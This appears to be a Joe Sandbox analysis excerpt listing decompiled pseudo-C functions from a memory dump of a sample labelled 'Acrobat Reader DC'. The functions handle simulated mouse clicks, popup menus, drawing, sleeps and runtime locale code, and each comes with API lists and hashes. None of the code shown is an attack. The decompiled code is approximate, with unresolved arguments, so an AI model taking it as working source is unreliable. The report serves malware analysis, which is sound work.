                                  			E00436A0B(struct HWND__** _a4, intOrPtr _a8, intOrPtr _a12, int _a16, int _a20) {
                                  				struct tagRECT _v20;
                                  				intOrPtr _t28;
                                  				struct HWND__* _t33;
                                  				intOrPtr _t37;
                                  				int _t47;
                                  				intOrPtr _t51;
                                  				int _t52;
                                  				struct HWND__* _t54;
                                  				signed short _t57;
                                  				intOrPtr _t58;
                                  				signed short _t63;
                                  				long _t66;
                                  
                                  				_t54 =  *_a4;
                                  				_t63 = _a20;
                                  				_t57 = _a16;
                                  				GetWindowRect(_t54,  &_v20);
                                  				if(_t57 == 0xffffffff) {
                                  					asm("cdq");
                                  					_t57 = _v20.right - _v20.left - _t54 >> 1;
                                  				}
                                  				if(_t63 == 0xffffffff) {
                                  					asm("cdq");
                                  					_t63 = _v20.bottom - _v20.top - _t54 >> 1;
                                  				}
                                  				_t66 = (_t63 & 0x0000ffff) << 0x00000010 | _t57 & 0x0000ffff;
                                  				_t28 = _a8;
                                  				_t51 = 1;
                                  				_a16 = 0x201;
                                  				_a20 = 0x203;
                                  				_t47 = 0x202;
                                  				_t58 = 1;
                                  				if(_t28 != 2) {
                                  					if(_t28 == 1) {
                                  						_a16 = 0x207;
                                  						_t47 = 0x208;
                                  						_t58 = 0x10;
                                  						goto L8;
                                  					}
                                  				} else {
                                  					_a16 = 0x204;
                                  					_t47 = 0x205;
                                  					_t58 = _t28;
                                  					L8:
                                  					_a20 = 0x206;
                                  				}
                                  				_a8 = _t51;
                                  				if(_a12 >= _t51) {
                                  					while(1) {
                                  						asm("cdq");
                                  						_push(_t66);
                                  						_t33 =  *_a4;
                                  						_push(_t58);
                                  						if((_t51 - _t54 >> 1) + (_t51 - _t54 >> 1) != _t51) {
                                  							_t52 = _a16;
                                  						} else {
                                  							_t52 = _a20;
                                  						}
                                  						PostMessageW(_t33, _t52, ??, ??);
                                  						Sleep(0);
                                  						_t54 =  *_a4;
                                  						PostMessageW(_t54, _t47, 0, _t66);
                                  						Sleep(0);
                                  						_t37 = _a8 + 1;
                                  						_a8 = _t37;
                                  						if(_t37 > _a12) {
                                  							break;
                                  						}
                                  						_t51 = _a8;
                                  					}
                                  					return 1;
                                  				} else {
                                  					return _t51;
                                  				}
                                  			}
















                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: RectWindow
                                  • String ID:
                                  • API String ID: 861336768-0
                                  • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                  • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                                  • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                  • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004478AC(struct HWND__* _a4, signed int _a8, signed short _a12, signed short _a16) {
                                  				struct tagPOINT _v12;
                                  				void* _t24;
                                  				signed int _t25;
                                  				signed int _t26;
                                  				intOrPtr _t31;
                                  				int _t41;
                                  				intOrPtr _t42;
                                  				intOrPtr _t44;
                                  				intOrPtr _t45;
                                  				intOrPtr _t47;
                                  				struct HWND__** _t56;
                                  				struct HWND__* _t57;
                                  
                                  				_t41 = _a8;
                                  				_t57 = _a4;
                                  				_t25 = E00430C09(_t24, 0x4a8630, _t57);
                                  				_t42 =  *0x4a8690; // 0x0
                                  				_t56 =  *( *(_t42 + _t25 * 4));
                                  				if(_t41 != _t57) {
                                  					_t26 = E00441B7C(0x4a8630, _t41);
                                  					_a8 = _t26;
                                  					if(_t26 == 0xffffffff) {
                                  						goto L3;
                                  					} else {
                                  						_t44 =  *0x4a86a4; // 0xa51ad0
                                  						_t45 =  *((intOrPtr*)( *((intOrPtr*)(_t44 + _t26 * 4))));
                                  						_t31 =  *((intOrPtr*)(_t45 + 0x88));
                                  						if(_t31 == 0xe || _t31 == 0xf || _t31 == 0x13 || _t31 == 0x10 ||  *((intOrPtr*)(_t45 + 8)) == 0) {
                                  							goto L3;
                                  						} else {
                                  							GetCursorPos( &_v12);
                                  							_t47 =  *0x4a86a4; // 0xa51ad0
                                  							return TrackPopupMenuEx( *( *((intOrPtr*)( *((intOrPtr*)(_t47 + _a8 * 4)))) + 8), 0, _v12.x, _v12.y,  *_t56, 0);
                                  						}
                                  					}
                                  				} else {
                                  					if(_t56[0x69] == 0) {
                                  						L3:
                                  						return DefDlgProcW(_t57, 0x7b, _t41, (_a16 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff);
                                  					} else {
                                  						GetCursorPos( &_v12);
                                  						return TrackPopupMenuEx(_t56[0x69], 0, _v12, _v12.y, _t57, 0);
                                  					}
                                  				}
                                  			}
















                                  APIs
                                  • GetCursorPos.USER32(?), ref: 004478E2
                                  • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                  • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                  • GetCursorPos.USER32(00000000), ref: 0044796A
                                  • TrackPopupMenuEx.USER32(?,00000000,00000000,?,?,00000000), ref: 00447991
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: CursorMenuPopupTrack$Proc
                                  • String ID:
                                  • API String ID: 1300944170-0
                                  • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                  • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                  • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                  • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 96%
                                  			E004479A0(struct HWND__* _a4, int _a8, signed short _a12, signed short _a16) {
                                  				intOrPtr _v8;
                                  				intOrPtr _v12;
                                  				struct tagRECT _v28;
                                  				struct tagPOINT _v36;
                                  				struct tagPOINT _v44;
                                  				void* _t30;
                                  				intOrPtr _t32;
                                  				long _t38;
                                  				intOrPtr _t43;
                                  				struct HWND__* _t47;
                                  				signed int _t48;
                                  				intOrPtr _t53;
                                  				intOrPtr _t61;
                                  				intOrPtr _t66;
                                  				struct HWND__* _t75;
                                  
                                  				_t75 = _a4;
                                  				_t71 = E00430C09(_t30, 0x4a8630, _t75);
                                  				_t32 =  *0x4a8690; // 0x0
                                  				_t53 =  *((intOrPtr*)( *((intOrPtr*)(_t32 + _t31 * 4))));
                                  				GetClientRect(_t75,  &_v28);
                                  				GetCursorPos( &_v36);
                                  				_v44.x = _v36.x;
                                  				_v44.y = _v36.y;
                                  				ScreenToClient(_t75,  &_v44);
                                  				_t38 = _v44.x;
                                  				if(_t38 < _v28.left || _t38 > _v12) {
                                  					L12:
                                  					return DefDlgProcW(_t75, 0x20, _a8, (_a16 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff);
                                  				} else {
                                  					_t43 = _v36.y;
                                  					if(_t43 < _v28.bottom || _t43 > _v8) {
                                  						goto L12;
                                  					} else {
                                  						if( *((char*)(_t53 + 0x16c)) == 0) {
                                  							L11:
                                  							_t66 =  *0x4a8690; // 0x0
                                  							E00430737( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t66 + _t71 * 4)))) + 0x10)));
                                  							if( *((intOrPtr*)(_t53 + 0x14)) != 0) {
                                  								goto L10;
                                  							} else {
                                  								goto L12;
                                  							}
                                  						} else {
                                  							_push(_v28.top);
                                  							_t47 = WindowFromPoint(_v28);
                                  							if(_t47 == 0 || _t47 == _t75) {
                                  								goto L11;
                                  							} else {
                                  								_t48 = E00441B7C(0x4a8630, _t47);
                                  								if(_t48 == 0xffffffff) {
                                  									goto L11;
                                  								} else {
                                  									_t61 =  *0x4a86a4; // 0xa51ad0
                                  									_t50 =  *( *((intOrPtr*)( *((intOrPtr*)(_t61 + _t48 * 4)))) + 0x7c) & 0x0000ffff;
                                  									if(( *( *((intOrPtr*)( *((intOrPtr*)(_t61 + _t48 * 4)))) + 0x7c) & 0x0000ffff) == 0xffff) {
                                  										goto L11;
                                  									} else {
                                  										E00430737(_t50);
                                  										L10:
                                  										return 1;
                                  									}
                                  								}
                                  							}
                                  						}
                                  					}
                                  				}
                                  			}



















                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Client$CursorFromPointProcRectScreenWindow
                                  • String ID:
                                  • API String ID: 1822080540-0
                                  • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                  • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                  • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                  • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 68%
                                  			E00445870(void* __ebx, intOrPtr _a4, struct HWND__* _a8) {
                                  				void* __edi;
                                  				void* __esi;
                                  				WCHAR* _t22;
                                  				long _t24;
                                  				intOrPtr _t26;
                                  				long _t31;
                                  				void* _t34;
                                  				int _t35;
                                  				signed int _t44;
                                  				intOrPtr _t45;
                                  				struct HWND__* _t46;
                                  				WCHAR* _t47;
                                  				void* _t48;
                                  				void* _t49;
                                  				signed int _t54;
                                  
                                  				_t34 = __ebx;
                                  				_t46 = _a8;
                                  				if(IsWindowVisible(_t46) != 0 ||  *((char*)(_a4 + 5)) == 1) {
                                  					_t44 = SendMessageW(_t46, 0xe, 0, 0);
                                  					_t54 = _t44;
                                  					if(_t54 == 0) {
                                  						_t44 = 0x7fff;
                                  					}
                                  					_push(_t34);
                                  					_t4 = _t44 + 1; // 0x1
                                  					_t35 = _t4;
                                  					_push( ~(0 | _t54 > 0x00000000) | _t35 * 0x00000002);
                                  					_t22 = E004115D7(_t44, _t46, _t54);
                                  					_t49 = _t48 + 4;
                                  					_t47 = _t22;
                                  					_t24 = SendMessageW(_a8, 0xd, _t35, _t47);
                                  					_t47[_t44] = 0;
                                  					if(_t24 > 0) {
                                  						_t45 = _a4;
                                  						__eflags =  *((intOrPtr*)(_t45 + 0xc));
                                  						if( *((intOrPtr*)(_t45 + 0xc)) == 0) {
                                  							_t31 = E004111C1(_t47);
                                  							_t49 = _t49 + 4;
                                  							CharUpperBuffW(_t47, _t31);
                                  						}
                                  						_t26 = E004134BD(_t47,  *((intOrPtr*)(_t45 + 0x24)));
                                  						_t49 = _t49 + 8;
                                  						_push(_t47);
                                  						__eflags = _t26;
                                  						if(_t26 == 0) {
                                  							goto L6;
                                  						} else {
                                  							 *((char*)(_t45 + 0xe8)) = 1;
                                  							E004111DC();
                                  							__eflags = 0;
                                  							return 0;
                                  						}
                                  					} else {
                                  						_push(_t47);
                                  						L6:
                                  						E004111DC();
                                  						goto L7;
                                  					}
                                  				} else {
                                  					L7:
                                  					return 1;
                                  				}
                                  			}



















                                  APIs
                                  • IsWindowVisible.USER32 ref: 00445879
                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                  • _wcslen.LIBCMT ref: 004458FB
                                  • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                  • String ID:
                                  • API String ID: 3087257052-0
                                  • Opcode ID: 40d03142f7c4b893e7ee3f174c8354c03563b4f575d30d0b3a1bb9a9e66914fb
                                  • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                  • Opcode Fuzzy Hash: 40d03142f7c4b893e7ee3f174c8354c03563b4f575d30d0b3a1bb9a9e66914fb
                                  • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0044719B(struct HDC__* _a4, intOrPtr _a8, intOrPtr _a12, long _a16, long _a20) {
                                  				struct tagLOGBRUSH _v16;
                                  				intOrPtr _t11;
                                  				void* _t14;
                                  				void* _t17;
                                  				long _t21;
                                  				void* _t22;
                                  				long _t23;
                                  				intOrPtr _t24;
                                  				struct HDC__* _t25;
                                  				void* _t27;
                                  				void* _t28;
                                  				void* _t29;
                                  
                                  				_t21 = _a16;
                                  				_t24 = _a8;
                                  				_t23 = _a20;
                                  				if(_t24 == 0xffffffff) {
                                  					L10:
                                  					_t25 = _a4;
                                  					L11:
                                  					_t11 = _a12;
                                  					if(_t11 == 0xffffffff) {
                                  						L14:
                                  						return _t11;
                                  					}
                                  					_t35 = _t11 - 0xfffffffe;
                                  					if(_t11 == 0xfffffffe) {
                                  						goto L14;
                                  					}
                                  					return SelectObject(_t25, E00441432(_t22, _t35, _t11, 0));
                                  				}
                                  				_t27 =  *0x4a86f4 - _t24; // 0x0
                                  				if(_t27 != 0) {
                                  					L4:
                                  					_t14 =  *0x4a86e4; // 0x0
                                  					if(_t14 != 0) {
                                  						DeleteObject(_t14);
                                  						 *0x4a86e4 = 0;
                                  					}
                                  					 *0x4a86f0 = _t23;
                                  					 *0x4a86f4 = _t24;
                                  					 *0x4a86f8 = _t21;
                                  					_v16.lbStyle = 0;
                                  					_v16.lbColor = _t24;
                                  					_v16.lbHatch = 0;
                                  					if(_t23 != 1) {
                                  						_t21 = _t21 | 0x00010000;
                                  					}
                                  					_t17 = ExtCreatePen(_t21, _t23,  &_v16, 0, 0);
                                  					_t25 = _a4;
                                  					 *0x4a86e4 = _t17;
                                  					 *0x4a86e8 = SelectObject(_t25, _t17);
                                  					if( *0x4a86ec == 0) {
                                  						BeginPath(_t25);
                                  						 *0x4a86ec = 1;
                                  					}
                                  					goto L11;
                                  				}
                                  				_t28 =  *0x4a86f0 - _t23; // 0x0
                                  				if(_t28 != 0) {
                                  					goto L4;
                                  				}
                                  				_t29 =  *0x4a86f8 - _t21; // 0x0
                                  				if(_t29 == 0) {
                                  					goto L10;
                                  				}
                                  				goto L4;
                                  			}
















                                  APIs
                                  • DeleteObject.GDI32(00000000), ref: 004471D8
                                  • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                  • SelectObject.GDI32(?,00000000), ref: 00447228
                                  • BeginPath.GDI32(?), ref: 0044723D
                                  • SelectObject.GDI32(?,00000000), ref: 00447266
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Object$Select$BeginCreateDeletePath
                                  • String ID:
                                  • API String ID: 2338827641-0
                                  • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                  • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                  • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                  • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 77%
                                  			E00434582(int __eax, long long __fp0, long _a4) {
                                  				intOrPtr _v8;
                                  				union _LARGE_INTEGER _v12;
                                  				union _LARGE_INTEGER _v20;
                                  				intOrPtr _v24;
                                  				intOrPtr _v28;
                                  				long long _v36;
                                  				long long _v44;
                                  				signed char _t17;
                                  				long _t25;
                                  				long _t26;
                                  
                                  				_t27 = __fp0;
                                  				_t13 = __eax;
                                  				_t25 = _a4;
                                  				_t26 = _t25;
                                  				if(_t26 < 0) {
                                  					return __eax;
                                  				} else {
                                  					if(_t26 != 0) {
                                  						if(_t25 >= 0xf) {
                                  							L10:
                                  							Sleep(_t25);
                                  							return _t13;
                                  						}
                                  						_t13 = QueryPerformanceCounter( &_v20);
                                  						if(_t13 == 0) {
                                  							goto L10;
                                  						}
                                  						_a4 = _t25;
                                  						asm("fild dword [ebp+0x8]");
                                  						if(_t25 < 0) {
                                  							_t27 = __fp0 +  *0x48cd18;
                                  						}
                                  						_v44 = _t27;
                                  						do {
                                  							Sleep(0);
                                  							QueryPerformanceCounter( &_v12);
                                  							asm("sbb eax, [ebp-0xc]");
                                  							_v28 = _v12.LowPart - _v20.LowPart;
                                  							_v24 = _v8;
                                  							asm("fild qword [ebp-0x18]");
                                  							_v36 = _t27;
                                  							_t17 = E0040DBD0(_v8);
                                  							asm("fdivr qword [ebp-0x20]");
                                  							asm("fcomp qword [ebp-0x28]");
                                  							asm("fnstsw ax");
                                  						} while ((_t17 & 0x00000005) != 0);
                                  						return _t17;
                                  					} else {
                                  						Sleep(0);
                                  						return _t13;
                                  					}
                                  				}
                                  			}














                                  APIs
                                  • Sleep.KERNEL32(00000000), ref: 00434598
                                  • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                  • Sleep.KERNEL32(00000000), ref: 004345D4
                                  • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: CounterPerformanceQuerySleep
                                  • String ID:
                                  • API String ID: 2875609808-0
                                  • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                  • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                  • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                  • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0042FD29(struct HDC__* _a4, intOrPtr _a8) {
                                  				void* _t3;
                                  				void* _t5;
                                  				int _t6;
                                  				intOrPtr _t10;
                                  				struct HDC__* _t11;
                                  
                                  				_t11 = _a4;
                                  				_t10 = _a8;
                                  				if( *0x4a86ec != 0) {
                                  					EndPath(_t11);
                                  					 *0x4a86ec = 0;
                                  					if(_t10 == 0xffffffff || _t10 == 0xfffffffe) {
                                  						StrokePath(_t11);
                                  					} else {
                                  						StrokeAndFillPath(_t11);
                                  					}
                                  				}
                                  				_t3 =  *0x4a86e8; // 0x0
                                  				if(_t3 == 0) {
                                  					return _t3;
                                  				} else {
                                  					SelectObject(_t11, _t3);
                                  					_t5 =  *0x4a86e4; // 0x0
                                  					 *0x4a86e8 = 0;
                                  					_t6 = DeleteObject(_t5);
                                  					 *0x4a86e4 = 0;
                                  					 *0x4a86f4 = 0xffffffff;
                                  					return _t6;
                                  				}
                                  			}









                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Path$ObjectStroke$DeleteFillSelect
                                  • String ID:
                                  • API String ID: 2625713937-0
                                  • Opcode ID: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                  • Instruction ID: 382768f54733291aaafbd4c53fc5fd67df7ff3e11fccf1fbf51b229105ba29ed
                                  • Opcode Fuzzy Hash: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                  • Instruction Fuzzy Hash: B3F036751125109BD3519F28FD4875E3B68E747321F94423AEA15923F0CB785449CB6D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 77%
                                  			E00417803(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                  				signed int _t12;
                                  				void* _t25;
                                  				void* _t28;
                                  				intOrPtr _t29;
                                  				void* _t30;
                                  				void* _t31;
                                  
                                  				_t31 = __eflags;
                                  				_t26 = __edi;
                                  				_t25 = __edx;
                                  				_t20 = __ebx;
                                  				_push(0xc);
                                  				_push(0x48d128);
                                  				E00416C70(__ebx, __edi, __esi);
                                  				_t28 = E00417A69(__ebx, _t31);
                                  				_t12 =  *0x490800; // 0xfffffffe
                                  				if(( *(_t28 + 0x70) & _t12) == 0) {
                                  					L6:
                                  					E004182CB(_t20, _t26, 0xc);
                                  					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
                                  					_t29 = _t28 + 0x6c;
                                  					 *((intOrPtr*)(_t30 - 0x1c)) = E004177B6(_t29,  *0x490a48);
                                  					 *(_t30 - 4) = 0xfffffffe;
                                  					E00417870();
                                  				} else {
                                  					_t33 =  *((intOrPtr*)(_t28 + 0x6c));
                                  					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                                  						goto L6;
                                  					} else {
                                  						_t29 =  *((intOrPtr*)(E00417A69(_t20, _t33) + 0x6c));
                                  					}
                                  				}
                                  				_t34 = _t29;
                                  				if(_t29 == 0) {
                                  					_push(0x20);
                                  					E00411924(_t25, _t34);
                                  				}
                                  				return E00416CB5(_t29);
                                  			}










                                  APIs
                                  • __getptd.LIBCMT ref: 0041780F
                                    • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                    • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                  • __getptd.LIBCMT ref: 00417826
                                  • __amsg_exit.LIBCMT ref: 00417834
                                  • __lock.LIBCMT ref: 00417844
                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                  • String ID:
                                  • API String ID: 938513278-0
                                  • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                  • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                  • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                  • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

